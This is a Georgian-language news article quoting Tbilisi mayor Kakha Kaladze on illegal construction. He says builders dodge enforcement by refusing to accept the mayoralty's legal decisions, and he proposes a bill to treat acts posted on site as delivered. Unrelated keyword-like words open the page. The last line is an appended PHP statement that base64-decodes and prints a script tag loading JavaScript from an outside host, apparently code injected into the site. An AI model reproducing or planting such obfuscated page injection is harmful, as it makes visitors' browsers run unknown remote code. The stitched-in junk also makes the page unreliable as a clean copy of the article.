celsiusi
ავერსი შნაიდერი
უკანონო მშენებლობების მშენებლები გარკვეულ ხრიკს მიმართავენ, იურიდიული სამსახურის მიერ გამოცემულ აქტებს არ იბარებენ, - ამის შესახებ თბილისის მერმა, კახა კალაძემ დედაქალაქის მთავრობის სხდომის დაწყებისას განაცხადა. 
 
მისი თქმით, უკანონო  მშენებლობები უკვე სისხლის სამართლის პასუხისმგებლობას ექვემდებარება, მაგრამ კომპანიებმა "იპოვეს გამოსავალი" და შესაბამის ჯარიმებს არ იბარებენ, ასე კი თავს არიდებენ სანქციას.
 
„მერიაში ჩვენი გუნდის მოსვლის შემდეგ მნიშვნელოვანი რეფორმები განვახორციელეთ. ჩვენ შევქმენით მუნიციპალური ინსპექცია, რომელიც აღიჭურვა შესაბამისი ტექნოლოგიებით, გაიზარდა ჯარიმები დარღვევებზე 50 ათას ლარამდე, რაც ძალიან მნიშვნელოვანი იყო, თუმცა უკანონო მშენებლობების ნაწილში დარღვევებს მაინც ვაწყდებოდით, რადგან მოგების ნაწილში ძალიან დიდი თანხებზე არის საუბარი ინვესტორებისთვის და ალბათ, ამ თანხების გადახდა უღირდათ მშენებლობის უკანონოდ გაგრძელებით.
 
ამის შემდეგ შემოვიღეთ სისხლის სამართლის დანაშაული. ახლა გვაქვს ერთი პრობლემა, რომელსაც ბოლო თვეების განმავლობაში ვაწყდებით, მშენებლები, რომლებიც უკანონო მშენებლობას ახორციელებენ, ერთგვარ ხრიკს იყენებენ - კერძოდ, კონკრეტული სამშენებლო კომპანიები არ იბარებენ მერიის იურიდიული სამსახურის გადაწყვეტილებას, ხოლო გააწყვეტილების ჩაუბარებლობის გამო ვეღარ იქმნება საფუძველი გადაწყვეტილების აღსრულებისთვის, ანუ არ ხდება ვადების ათვლა. ეს სერიოზულ პრობლემას წარმოადგენს“, - განაცხადა კალაძემ.
 
მისივე თქმით, თბილისის მერია მიმართავს პარლამენტს აღნიშნულის შეცვლისთვის და უმაღლესი საკანონმდებლო ორგანოს მხარდაჭერის იმედი აქვს.
 
„საკანონმდებლო ინიციატივით მივმართავთ პარლამენტს, რომ იურიდიული სამსახურის მიერ გამოცემული აქტის განთავსება მოხდეს ობიექტზე და ის ჩაითვალოს გამოქვეყნებულად და ჩაბარებულად. ეს კი იმას ნიშნავს, რომ მშენებლოს მიერ აქტის ჩაუბარებლობა ვეღარ შეაფერხებს აქტის აღსრულების პროცესს“, - განაცხადა კალაძემ.
 
თბილისის მერმა აქვე უპასუხა ოპოზიციის ბრალდებებს, რომ თბილისის მერია უკანონო მშენებლობებზე თვალს ხუჭავს და თქვა, რომ ეს ასე არ არის და ყველა მსგავს შემთხვევას უმკაცრესი პასუხი გაეცემა.
898
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");